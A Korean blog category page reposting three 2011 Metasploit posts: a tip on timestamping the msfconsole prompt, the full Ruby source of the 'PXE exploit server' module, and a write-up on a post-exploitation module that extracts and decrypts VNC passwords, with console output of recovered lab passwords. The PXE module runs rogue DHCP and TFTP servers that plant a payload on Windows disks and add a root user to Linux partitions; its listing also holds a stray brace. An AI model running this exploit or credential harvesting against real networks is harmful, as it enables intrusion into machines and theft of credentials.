'MSF'에 해당되는 글 3건

  1. 2011.10.11 MSFConsole Prompt Fiddling
  2. 2011.08.08 PXE exploit server
  3. 2011.03.21 Metasploit VNC Password Extraction
2011.10.11 19:11

MSFConsole Prompt Fiddling

In @carnal0wnage and my presentation at DerbyCon 2011 we talked about using SCREENand SCRIPT to keep connections live / use them across SSH sessions, and log everything that happens. What we didn't cover is the fact that there isn't a time stamp for those logs. Now, Metasploit has multiple ways of creating logs:

cat ~/.msf4/logs/framework.log       This log automatically logs all of the error data that is great for trouble shooting when something is working, but doesn't record what you are doing inside of msfconsole
msf> spool ~/myclient.log The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe about this one is that it doesn't log the actual command you issued.
msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true 
These combined essentially do the same thing as spool except that they go into different logs, but do actually log the command you issued

 

Plenty of logging right? But none of them really 'log everything' and time stamps are not a regular occurrence in them. Cool, but we need both. We've got the 'log everything' with the Linux 'script' command, we just need a way to inject time stamps into our log.

Enter the ever mutable 'msf>' prompt:


A lesser known variable in MSFConsole is 'PROMPT'. You can set this pretty much like any other OS can, however there are some metasploit specific things you can add. Using a three letter abbreviation you can even add color to it. 

For example lets add our hostname to our prompt:

  • set PROMPT %H

changes msf> to myattackmachine>

And you can combine and add things that you wish:

  • set PROMPT %H Just more text %U

changes the prompt to:  myattackmachine Just more text mubix>  (%U is username)

For reference here are the other working % variables that I know of:

  • %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
  • %H = Host name (again, would be cool if this changed when in meterpreter)
  • %J = Current number of jobs running
  • %L = Local IP (makes it easy to remember what to put in LHOST)
  • %S = Currently number of sessions open
  • %T = Time stamp
  • %U = Username (yes, would be awesome if this changed in meterpreter too)

Now if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You'll have to play around with the color's names as I don't know them all. %red %blu %blk etc...

Combine all of that with script and you've got something awesome. I set my PROMPT to:

  • set PROMPT %T S:%S J:%J
  • 1970-01-01 00:00:00 +0000 S:0 J:0> 

This gives me the number of jobs and sessions and has the time stamp every time I throw a command, so in my logs I can very easily narrow down the exact time when I did or didnt' do something. The number of sessions and jobs are just good to know items.

Throw in one more trick to make the whole thing a cake walk:

In your ~/.msf4 directory, if you haven't already, create a file called 'msfconsole.rc'. This magical file will run every time you start msfconsole (with the express exception of when you specify a resource file to run from the command line using the -r argument). Throw your 'set PROMPT %blah %blah %blah' in there formatted however you like, and now whenever you start msfconsole you'll have your handy dandy timestamp.

Shout out to @egyp7 for showing me this.



출처 : Room362.com

Trackback 0 Comment 0
2011.08.08 18:54

PXE exploit server

##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##
  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  
require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'
  
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
  
    include Msf::Exploit::Remote::TFTPServer
  
    def initialize
        super(
            'Name'        => 'PXE exploit server',
            'Version'     => '$Revision: 13493 $',
            'Description'    => %q{
                This module provides a PXE server, running a DHCP and TFTP server. 
                The default configuration loads a linux kernel and initrd into memory that 
                reads the hard drive; placing the payload on the hard drive of any Windows 
                partition seen, and add a uid 0 user with username and password metasploit to any 
                linux partition seen.
            },
            'Author'      => [ 'scriptjunkie' ],
            'License'     => MSF_LICENSE,
            'Version'        => '$Revision: 13493 $',
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'       => 4500,
                    'DisableNops' => 'True',
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows Universal'
                        
                        }
                    ],
                ],
            'Privileged'     => true,
            'Stance' => Msf::Exploit::Stance::Passive,
            'DefaultTarget'  => 0
        )
  
        register_options(
            [
                OptInt.new('SESSION',   [ false'A session to pivot the attack through' ])
            ], self.class)
  
        register_advanced_options(
            [
                OptString.new('TFTPROOT',   [ false'The TFTP root directory to serve files from' ]),
                OptString.new('SRVHOST',   [ false'The IP of the DHCP server' ]),
                OptString.new('NETMASK',   [ false'The netmask of the local subnet', '255.255.255.0' ]),
                OptString.new('DHCPIPSTART',   [ false'The first IP to give out' ]),
                OptString.new('DHCPIPEND',   [ false'The last IP to give out' ])
            ], self.class)
    end
  
    def exploit
        if not datastore['TFTPROOT']
            datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
        end
        datastore['FILENAME'] = "update1"
        datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!
  
        # Prepare payload
        print_status("Creating initrd")
        initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
        uncompressed = Rex::Text.ungzip(initrd)
        payl = payload.generate
        uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
        initrd = Rex::Text.gzip(uncompressed)
  
        # Meterpreter attack
        if framework.sessions.include? datastore['SESSION']
            client = framework.sessions[datastore['SESSION']]
            if not client.lanattacks
                print_status("Loading lanattacks extension...")
                client.core.use("lanattacks")
            end
  
            print_status("Loading DHCP options...")
            client.lanattacks.load_dhcp_options(datastore)
            1.upto(4) do |i|
                print_status("Loading file #{i} of 4")
                if i < 4
                    contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
                else
                    contents = initrd
                end
                client.lanattacks.add_tftp_file("update#{i}",contents)
            end
            print_status("Starting TFTP server...")
            client.lanattacks.start_tftp
            print_status("Starting DHCP server...")
            client.lanattacks.start_dhcp
            print_status("pxesploit attack started")
            return
        end
  
        # normal attack
        print_status("Starting TFTP server...")
        @tftp = Rex::Proto::TFTP::Server.new
        @tftp.set_tftproot(datastore['TFTPROOT'])
        @tftp.register_file('update4',initrd)
        @tftp.start
  
        print_status("Starting DHCP server...")
        @dhcp = Rex::Proto::DHCP::Server.new( datastore )
        @dhcp.start
        print_status("pxesploit attack started")
  
        # Wait for finish..
        @tftp.thread.join
        @dhcp.thread.join
        print_status("pxesploit attack completed")
    end
  
end


출처 : exploit-db.com

Trackback 0 Comment 0
2011.03.21 19:36

Metasploit VNC Password Extraction

Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on Penetration Tests in the past but didn't know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "Thats definitely within my coding ability to contribute a patch for". After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and it's control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn't in the metasploit trunk so until/if if gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :

 

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 


출처 : http://www.room362.com/

Trackback 1 Comment 0